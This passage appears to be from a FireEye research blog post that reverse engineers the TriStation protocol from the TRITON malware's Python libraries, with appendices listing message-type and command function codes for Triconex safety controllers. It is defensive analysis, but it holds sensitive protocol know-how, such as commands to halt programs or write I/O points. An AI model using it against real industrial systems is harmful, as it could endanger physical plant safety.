TsLow.pyc (Figure 1) contains several pieces of code for error handling, but these also present some cues to the protocol structure.


Figure 1: TsLow.pyc function print_last_error()

In the TsLow.pyc’s function for print_last_error we see error handling for “TCM Error”. This compares the TriStation packet value at offset 0 with a value in a corresponding array from TS_cnames.pyc (Figure 2), which is largely used as a “dictionary” for the protocol.


Figure 2: TS_cnames.pyc TS_cst array

From this we can infer that offset 0 of the TriStation protocol contains message types. This is supported by an additional function, tcm_result, which declares type, size = struct.unpack('<HH', data_received[0:4]), stating that the first two bytes should be handled as integer type and the second two bytes are integer size of the TriStation message. This is our first glimpse into what the threat actor(s) understood about the TriStation protocol.

Since there are only 11 defined message types, it really doesn't matter much if the type is one byte or two because the second byte will always be 0x00.

We also have indications that message type 5 is for all Execution Command Requests and Responses, so it is curious to observe that the TRITON developers called this “Command Reply.” (We won’t understand this naming convention until later.)

Next we examine TsLow.pyc’s print_last_error function (Figure 3) to look at “TS Error” and “TS_names.” We begin by looking at the ts_err variable and see that it references ts_result.


Figure 3: TsLow.pyc function print_last_error() with ts_err highlighted

We follow that thread to ts_result, which defines a few variables in the next 10 bytes (Figure 4): dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). Now things are heating up. What fun. There’s a lot to unpack here, but the most interesting thing is how this piece script breaks down 10 bytes from ts_packet into different variables.


Figure 4: ts_result with ts_packet header variables highlighted


Figure 5: tcm_result

Referencing tcm_result (Figure 5) we see that it defines type and size as the first four bytes (offset 0 – 3) and tcm_result returns the packet bytes 4:-2 (offset 4 to the end minus 2, because the last two bytes are the CRC-16 checksum). Now that we know where tcm_result leaves off, we know that the ts_reply “cmd” is a single byte at offset 6, and corresponds to the values in the TS_cnames.pyc array and TS_names (Figure 6). The TRITON script also tells us that any integer value over 100 is a likely “command reply.” Sweet.

When looking back at the ts_result packet header definitions, we begin to see some gaps in the TRITON developer's knowledge: dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). We're clearly speculating based on naming conventions, but we get an impression that offsets 4, 5 and 6 could be "direction", "controller ID" and "command", respectively. Values such as "unk" show that the developer either did not know or did not care to identify this value. We suspect it is a constant, but this value is still unknown to us.


Figure 6: Excerpt TS_cnames.pyc TS_names array, which contain TRITON actor’s notes for execution command function codes

TriStation Protocol Packet Structure

The TRITON threat actor’s knowledge and reverse engineering effort provides us a better understanding of the protocol. From here we can start to form a more complete picture and document the basic functionality of TriStation. We are primarily interested in message type 5, Execution Command, which best illustrates the overall structure of the protocol. Other, smaller message types will have varying structure.


Figure 7: Sample TriStation "Allocate Program" Execution Command, with color annotation and protocol legend

Corroborating the TriStation Analysis

Minute discrepancies aside, the TriStation structure detailed in Figure 7 is supported by other public analyses. Foremost, researchers from the Coordinated Science Laboratory (CSL) at University of Illinois at Urbana-Champaign published a 2017 paper titled "Attack Induced Common-Mode Failures on PLC-based Safety System in a Nuclear Power Plant". The CSL team mentions that they used the Triconex System Access Application (TSAA) protocol to reverse engineer elements of the TriStation protocol. TSAA is a protocol developed by the same company as TriStation. Unlike TriStation, the TSAA protocol structure is described within official documentation. CSL assessed similarities between the two protocols would exist and they leveraged TSAA to better understand TriStation. The team's overall research and analysis of the general packet structure aligns with our TRITON-sourced packet structure.

There are some awesome blog posts and whitepapers out there that support our findings in one way or another. Writeups by Midnight Blue Labs, Accenture, and US-CERT each explain how the TRITON framework relates to the TriStation protocol in superb detail.

TriStation's Reverse Engineering and TRITON's Development

When TRITON was discovered, we began to wonder how the TRITON actor reverse engineered TriStation and implemented it into the framework. We have a lot of theories, all of which seemed plausible: Did they build, buy, borrow, or steal? Or some combination thereof?

Our initial theory was that the threat actor purchased a Triconex controller and software for their own testing and reverse engineering from the "ground up", although if this was the case we do not believe they had a controller with the exact vulnerable firmware version, else they would have had fewer problems with TRITON in practice at the victim site. They may have bought or used a demo version of the TriStation 1131 software, allowing them to reverse engineer enough of TriStation for the framework. They may have stolen TriStation Python libraries from ICS companies, subsidiaries or system integrators and used the stolen material as a base for TriStation and TRITON development. But then again, it is possible that they borrowed TriStation software, Triconex hardware and Python connectors from government-owned utility that was using them legitimately.

Looking at the raw TRITON code, some of the comments may appear oddly phrased, but we do get a sense that the developer is clearly using many of the right vernacular and acronyms, showing smarts on PLC programming. The TS_cnames.pyc script contains interesting typos such as 'Set lable', 'Alocate network accepted', 'Symbol table ccepted' and 'Set program information reponse'. These appear to be normal human error and reflect neither poor written English nor laziness in coding. The significant amount of annotation, cascading logic, and robust error handling throughout the code suggests thoughtful development and testing of the framework. This complicates the theory of "ground up" development, so did they base their code on something else?

While learning from the TriStation functionality within TRITON, we continued to explore legitimate TriStation software. We began our search for "TS1131.exe" and hit dead ends sorting through TriStation DLLs until we came across a variety of TriStation utilities in MSI form. We ultimately stumbled across a juicy archive containing "Trilog v4." Upon further inspection, this file installed "TriLog.exe," which the original TRITON executable mimicked, and a couple of supporting DLLs, all of which were timestamped around August 2006.

When we saw the DLL file description "Tricon Communications Interface" and original file name "TricCom.DLL", we knew we were in the right place. With a simple look at the file strings, "BAZINGA!" We struck gold.

File Name

tr1com40.dll

MD5

069247DF527A96A0E048732CA57E7D3D

Size

110592

Compile Date

2006-08-23

File Description

Tricon Communications Interface

Product Name

TricCom Dynamic Link Library

File Version

4.2.441

Original File Name

TricCom.DLL

Copyright

Copyright © 1993-2006 Triconex Corporation

The tr1com40.DLL is exactly what you would expect to see in a custom application package. It is a library that helps support the communications for a Triconex controller. If you've pored over TRITON as much as we have, the moment you look at strings you can see the obvious overlaps between the legitimate DLL and TRITON's own TS_cnames.pyc.


Figure 8: Strings excerpt from tr1com40.DLL

Each of the execution command "error codes" from TS_cnames.pyc are in the strings of tr1com40.DLL (Figure 8). We see "An MP has re-educated" and "Invalid Tristation I command". Even misspelled command strings verbatim such as "Non-existant data item" and "Alocate network accepted". We also see many of the same unknown values. What is obvious from this discovery is that some of the strings in TRITON are likely based on code used in communications libraries for Trident and Tricon controllers.

In our brief survey of the legitimate Triconex Corporation binaries, we observed a few samples with related string tables.

Pe:dllname

Compile Date

Reference CPP Strings Code

Lagcom40.dll

2004/11/19

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Tr1com40.dll

2006/08/23

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Tridcom.dll

2008/07/23

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Triccom.dll

2008/07/23

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Tridcom.dll

2010/09/29

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0 

Tr1com.dll

2011/04/27

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Lagcom.dll

2011/04/27

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Triccom.dll

2011/04/27

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

We extracted the CPP string tables in TR1STRS and LAGSTRS and the TS_cnames.pyc TS_names array from TRITON, and compared the 210, 204, and 212 relevant strings from each respective file.

TS_cnames.pyc TS_names and tr1com40.dll share 202 of 220 combined table strings. The remaining strings are unique to each, as seen here:

TS_cnames.TS_names (2017 pyc)

Tr1com40.dll (2006 CPP)

Go to DOWNLOAD mode

<200>

Not set

<209>

Unk75

Bad message from module

Unk76

Bad message type

Unk77

Bad TMI version number

Unk78

Module did not respond

Unk79

Open Connection: Invalid SAP %d

Unk81

Unsupported message for this TMI version

Unk83

 

Wrong command

 

TS_cnames.pyc TS_names and Tridcom.dll (1999 CPP) shared only 151 of 268 combined table strings, showing a much smaller overlap with the seemingly older CPP library. This makes sense based on the context that Tridcom.dll is meant for a Trident controller, not a Tricon controller. It does seem as though Tr1com40.dll and TR1STRS.CPP code was based on older work.

We are not shocked to find that the threat actor reversed legitimate code to bolster development of the TRITON framework. They want to work smarter, not harder, too. But after reverse engineering legitimate software and implementing the basics of the TriStation, the threat actors still had an incomplete understanding of the protocol. In TRITON's TS_cnames.pyc we saw "Unk75", "Unk76", "Unk83" and other values that were not present in the tr1com40.DLL strings, indicating that the TRITON threat actor may have explored the protocol and annotated their findings beyond what they reverse engineered from the DLL. The gaps in TriStation implementation show us why the actors encountered problems interacting with the Triconex controllers when using TRITON in the wild.

You can see more of the Trilog and Triconex DLL files on VirusTotal.

Item Name

MD5

Description

Tr1com40.dll

069247df527a96a0e048732ca57e7d3d

Tricom Communcations DLL

Data1.cab

e6a3c93a6d433cbaf6f573b6c09d76c4

Parent of Tr1com40.dll

Trilog v4.1.360R

13a3b83ba2c4236ca59aba679941c8a5

RAR Archive of TriLog

TridCom.dll

5c2ed617fdec4779cb33c89082a43100

Trident Communications DLL

Afterthoughts

Seeing Triconex systems targeted with malicious intent was new to the world six months ago. Moving forward it would be reasonable to anticipate additional frameworks, such as TRITON, designed for usage against other SIS controllers and associated technologies. If Triconex was within scope, we may see similar attacker methodologies affecting the dominant industrial safety technologies.

Basic security measures do little to thwart truly persistent threat actors and monitoring only IT networks is not an ideal situation. Visibility into both the IT and OT environments is critical for detecting the various stages of an ICS intrusion. Simple detection concepts such as baseline deviation can provide insight into abnormal activity.

While the TRITON framework was actively in use, how many traditional ICS “alarms” were set off while the actors tested their exploits and backdoors on the Triconex controller? How many times did the TriStation protocol, as implemented in their Python scripts, fail or cause errors because of non-standard traffic? How many TriStation UDP pings were sent and how many Connection Requests? How did these statistics compare to the baseline for TriStation traffic? There are no answers to these questions for now. We believe that we can identify these anomalies in the long run if we strive for increased visibility into ICS technologies.

We hope that by holding public discussions about ICS technologies, the Infosec community can cultivate closer relationships with ICS vendors and give the world better insight into how attackers move from the IT to the OT space. We want to foster more conversations like this and generally share good techniques for finding evil. Since most of all ICS attacks involve standard IT intrusions, we should probably come together to invent and improve any guidelines for how to monitor PCs and engineering workstations that bridge the IT and OT networks. We envision a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time, and their freedom. It's an ideal world, but something nice to shoot for.

Thanks and Future Work

There is still much to do for TRITON and TriStation. There are many more sub-message types and nuances for parsing out the nitty gritty details, which is hard to do without a controller of our own. And although we’ve published much of what we learned about the TriStation here on the blog, our work will continue as we continue our study of the protocol.

Thanks to everyone who did so much public research on TRITON and TriStation. We have cited a few individuals in this blog post, but there is a lot more community-sourced information that gave us clues and leads for our research and testing of the framework and protocol. We also have to acknowledge the research performed by the TRITON attackers. We borrowed a lot of your knowledge about TriStation from the TRITON framework itself.

Finally, remember that we're here to collaborate. We think most of our research is right, but if you notice any errors or omissions, or have ideas for improvements, please spear phish contact: smiller@fireeye.com.

Recommended Reading

Appendix A: TriStation Message Type Codes

The following table consists of hex values at offset 0 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x0

Message Type

1

Connection Request

2

Connection Response

3

Disconnect Request

4

Disconnect Response

5

Execution Command

6

Ping Command

7

Connection Limit Reached

8

Not Connected

9

MPS Are Dead

10

Access Denied

11

Connection Failed

Appendix B: TriStation Execution Command Function Codes

The following table consists of hex values at offset 6 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x6

TS_cnames String

0

0: 'Start download all',

1

1: 'Start download change',

2

2: 'Update configuration',

3

3: 'Upload configuration',

4

4: 'Set I/O addresses',

5

5: 'Allocate network',

6

6: 'Load vector table',

7

7: 'Set calendar',

8

8: 'Get calendar',

9

9: 'Set scan time',

A

10: 'End download all',

B

11: 'End download change',

C

12: 'Cancel download change',

D

13: 'Attach TRICON',

E

14: 'Set I/O address limits',

F

15: 'Configure module',

10

16: 'Set multiple point values',

11

17: 'Enable all points',

12

18: 'Upload vector table',

13

19: 'Get CP status ',

14

20: 'Run program',

15

21: 'Halt program',

16

22: 'Pause program',

17

23: 'Do single scan',

18

24: 'Get chassis status',

19

25: 'Get minimum scan time',

1A

26: 'Set node number',

1B

27: 'Set I/O point values',

1C

28: 'Get I/O point values',

1D

29: 'Get MP status',

1E

30: 'Set retentive values',

1F

31: 'Adjust clock calendar',

20

32: 'Clear module alarms',

21

33: 'Get event log',

22

34: 'Set SOE block',

23

35: 'Record event log',

24

36: 'Get SOE data',

25

37: 'Enable OVD',

26

38: 'Disable OVD',

27

39: 'Enable all OVDs',

28

40: 'Disable all OVDs',

29

41: 'Process MODBUS',

2A

42: 'Upload network',

2B

43: 'Set lable',

2C

44: 'Configure system variables',

2D

45: 'Deconfigure module',

2E

46: 'Get system variables',

2F

47: 'Get module types',

30

48: 'Begin conversion table download',

31

49: 'Continue conversion table download',

32

50: 'End conversion table download',

33

51: 'Get conversion table',

34

52: 'Set ICM status',

35

53: 'Broadcast SOE data available',

36

54: 'Get module versions',

37

55: 'Allocate program',

38

56: 'Allocate function',

39

57: 'Clear retentives',

3A

58: 'Set initial values',

3B

59: 'Start TS2 program download',

3C

60: 'Set TS2 data area',

3D

61: 'Get TS2 data',

3E

62: 'Set TS2 data',

3F

63: 'Set program information',

40

64: 'Get program information',

41

65: 'Upload program',

42

66: 'Upload function',

43

67: 'Get point groups',

44

68: 'Allocate symbol table',

45

69: 'Get I/O address',

46

70: 'Resend I/O address',

47

71: 'Get program timing',

48

72: 'Allocate multiple functions',

49

73: 'Get node number',

4A

74: 'Get symbol table',

4B

75: 'Unk75',

4C

76: 'Unk76',

4D

77: 'Unk77',

4E

78: 'Unk78',

4F

79: 'Unk79',

50

80: 'Go to DOWNLOAD mode',

51

81: 'Unk81',

52

 

53

83: 'Unk83',

54

 

55

 

56

 

57

 

58

 

59

 

5A

 

5B

 

5C

 

5D

 

5E

 

5F

 

60

 

61

 

62

 

63

 

64

100: 'Command rejected',

65

101: 'Download all permitted',

66

102: 'Download change permitted',

67

103: 'Modification accepted',

68

104: 'Download cancelled',

69

105: 'Program accepted',

6A

106: 'TRICON attached',

6B

107: 'I/O addresses set',

6C

108: 'Get CP status response',

6D

109: 'Program is running',

6E

110: 'Program is halted',

6F

111: 'Program is paused',

70

112: 'End of single scan',

71

113: 'Get chassis configuration response',

72

114: 'Scan period modified',

73

115: '<115>',

74

116: '<116>',

75

117: 'Module configured',

76

118: '<118>',

77

119: 'Get chassis status response',

78

120: 'Vectors response',

79

121: 'Get I/O point values response',

7A

122: 'Calendar changed',

7B

123: 'Configuration updated',

7C

124: 'Get minimum scan time response',

7D

125: '<125>',

7E

126: 'Node number set',

7F

127: 'Get MP status response',

80

128: 'Retentive values set',

81

129: 'SOE block set',

82

130: 'Module alarms cleared',

83

131: 'Get event log response',

84

132: 'Symbol table ccepted',

85

133: 'OVD enable accepted',

86

134: 'OVD disable accepted',

87

135: 'Record event log response',

88

136: 'Upload network response',

89

137: 'Get SOE data response',

8A

138: 'Alocate network accepted',

8B

139: 'Load vector table accepted',

8C

140: 'Get calendar response',

8D

141: 'Label set',

8E

142: 'Get module types response',

8F

143: 'System variables configured',

90

144: 'Module deconfigured',

91

145: '<145>',

92

146: '<146>',

93

147: 'Get conversion table response',

94

148: 'ICM print data sent',

95

149: 'Set ICM status response',

96

150: 'Get system variables response',

97

151: 'Get module versions response',

98

152: 'Process MODBUS response',

99

153: 'Allocate program response',

9A

154: 'Allocate function response',

9B

155: 'Clear retentives response',

9C

156: 'Set initial values response',

9D

157: 'Set TS2 data area response',

9E

158: 'Get TS2 data response',

9F

159: 'Set TS2 data response',

A0

160: 'Set program information reponse',

A1

161: 'Get program information response',

A2

162: 'Upload program response',

A3

163: 'Upload function response',

A4

164: 'Get point groups response',

A5

165: 'Allocate symbol table response',

A6

166: 'Program timing response',

A7

167: 'Disable points full',

A8

168: 'Allocate multiple functions response',

A9

169: 'Get node number response',

AA

170: 'Symbol table response',

AB

 

AC

 

AD

 

AE

 

AF

 

B0

 

B1

 

B2

 

B3

 

B4

 

B5

 

B6

 

B7

 

B8

 

B9

 

BA

 

BB

 

BC

 

BD

 

BE

 

BF

 

C0

 

C1

 

C2

 

C3

 

C4

 

C5

 

C6

 

C7

 

C8

200: 'Wrong command',

C9

201: 'Load is in progress',

CA

202: 'Bad clock calendar data',

CB

203: 'Control program not halted',

CC

204: 'Control program checksum error',

CD

205: 'No memory available',

CE

206: 'Control program not valid',

CF

207: 'Not loading a control program',

D0

208: 'Network is out of range',

D1

209: 'Not enough arguments',

D2

210: 'A Network is missing',

D3

211: 'The download time mismatches',

D4

212: 'Key setting prohibits this operation',

D5

213: 'Bad control program version',

D6

214: 'Command not in correct sequence',

D7

215: '<215>',

D8

216: 'Bad Index for a module',

D9

217: 'Module address is invalid',

DA

218: '<218>',

DB

219: '<219>',

DC

220: 'Bad offset for an I/O point',

DD

221: 'Invalid point type',

DE

222: 'Invalid Point Location',

DF

223: 'Program name is invalid',

E0

224: '<224>',

E1

225: '<225>',

E2

226: '<226>',

E3

227: 'Invalid module type',

E4

228: '<228>',

E5

229: 'Invalid table type',

E6

230: '<230>',

E7

231: 'Invalid network continuation',

E8

232: 'Invalid scan time',

E9

233: 'Load is busy',

EA

234: 'An MP has re-educated',

EB

235: 'Invalid chassis or slot',

EC

236: 'Invalid SOE number',

ED

237: 'Invalid SOE type',

EE

238: 'Invalid SOE state',

EF

239: 'The variable is write protected',

F0

240: 'Node number mismatch',

F1

241: 'Command not allowed',

F2

242: 'Invalid sequence number',

F3

243: 'Time change on non-master TRICON',

F4

244: 'No free Tristation ports',

F5

245: 'Invalid Tristation I command',

F6

246: 'Invalid TriStation 1131 command',

F7

247: 'Only one chassis allowed',

F8

248: 'Bad variable address',

F9

249: 'Response overflow',

FA

250: 'Invalid bus',

FB

251: 'Disable is not allowed',

FC

252: 'Invalid length',

FD

253: 'Point cannot be disabled',

FE

254: 'Too many retentive variables',

FF

255: 'LOADER_CONNECT',

 

256: 'Unknown reject code'